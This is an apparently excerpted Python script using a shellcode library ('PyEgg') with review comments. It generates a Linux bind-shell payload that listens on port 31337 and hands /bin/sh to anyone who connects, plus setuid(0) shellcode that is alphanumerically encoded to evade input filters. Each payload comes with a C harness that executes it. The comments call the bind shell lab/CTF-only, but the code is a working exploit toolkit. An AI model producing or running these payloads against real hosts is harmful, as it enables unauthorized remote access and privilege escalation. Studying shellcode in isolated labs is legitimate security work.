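# Listen on all available addresses at port 31337 (per the original note;
# PyEgg's bind() is only given the port here, so presumably it binds every
# interface).
# NOTE(review): the resulting payload is an unauthenticated bind shell --
# anyone who can reach TCP/31337 on the host gets /bin/sh. Isolated lab/CTF
# use only; never leave a harness built from this running on a reachable box.
# `egg` is created earlier in the file (not visible here); presumably a
# PyEgg instance like the one built further down.
egg.socket(socket.AF_INET, socket.SOCK_STREAM)
egg.bind(31337)
egg.listen()

# Got a connection: duplicate the descriptors (presumably the accepted
# socket over fds 2, 1 and 0) so the spawned shell talks over the network.
egg.accept()
egg.dup2(2)
egg.dup2(1)
egg.dup2(0)

# Uncomment to append 101 characters (NOPs)
#egg.appendNops(101)

# Run /bin/sh
egg.execSh()

# Exit cleanly
egg.exit(0)

sc = egg.getShellcode()

# Emit a minimal C harness that jumps straight into the shellcode string.
# The harness text is assembled as one string and printed once: this keeps
# the output byte-for-byte identical to the original one-print-per-line
# form (blank lines and trailing newline included) while being valid under
# both Python 2 (print statement with a single parenthesized argument) and
# Python 3, instead of Python-2-only print statements.
# NOTE(review): `sc` is spliced into a C string literal unescaped -- any '"',
# '\' or raw NUL byte in it breaks the literal; confirm getShellcode()
# returns an escaped ("\xNN") form before relying on this.
# NOTE(review): calling into a string literal needs an executable data/rodata
# segment; on a default hardened toolchain (NX) this harness will fault
# unless the binary is built to allow it -- verify for your toolchain.
print("\n".join([
    "#include <stdio.h>",
    "",
    'char *sc="%s";' % sc,
    "",
    "int main(void) {",
    "\t((void(*)())sc)();",
    "}",
    "",
]))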
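# Build a small Linux shellcode with PyEgg: setuid(0), a jump over a NOP
# sled, then exit(0), alphanumerically encoded.
a = PyEgg("linux")
gen = a.generator

# Call setuid(0): zero eax and ebx, then invoke the library's setuid stub.
a.buf += gen.xorEax()
a.buf += gen.xorEbx()
a.buf += gen.call("setuid")

# Jump over the NOPs generated right after this.
a.buf += gen.jmpTo(3)

# NOP generation is randomized, as you would expect from the library.
a.buf += gen.nop(2)

# Now simply exit, returning 0.
a.buf += gen.xorEax()
a.buf += gen.call("exit")

# Encode to an alphanumeric-only form before extracting the bytes
# (presumably so the payload survives filters that reject non-printable
# input -- confirm against PyEgg's alphaEncode()).
a.alphaEncode()
sc = a.getShellcode()

# Emit a minimal C harness that jumps straight into the shellcode string.
# The harness text is assembled as one string and printed once: this keeps
# the output byte-for-byte identical to the original one-print-per-line
# form (blank lines and trailing newline included) while being valid under
# both Python 2 (print statement with a single parenthesized argument) and
# Python 3, instead of Python-2-only print statements.
# NOTE(review): `sc` is spliced into a C string literal unescaped; the
# alphanumeric encoding should keep '"', '\' and NUL out of it, but confirm
# the exact form getShellcode() returns.
# NOTE(review): calling into a string literal needs an executable data/rodata
# segment; on a default hardened toolchain (NX) this harness will fault
# unless the binary is built to allow it -- verify for your toolchain.
print("\n".join([
    "#include <stdio.h>",
    "",
    'char *sc="%s";' % sc,
    "",
    "int main(void) {",
    "\t((void(*)())sc)();",
    "}",
    "",
]))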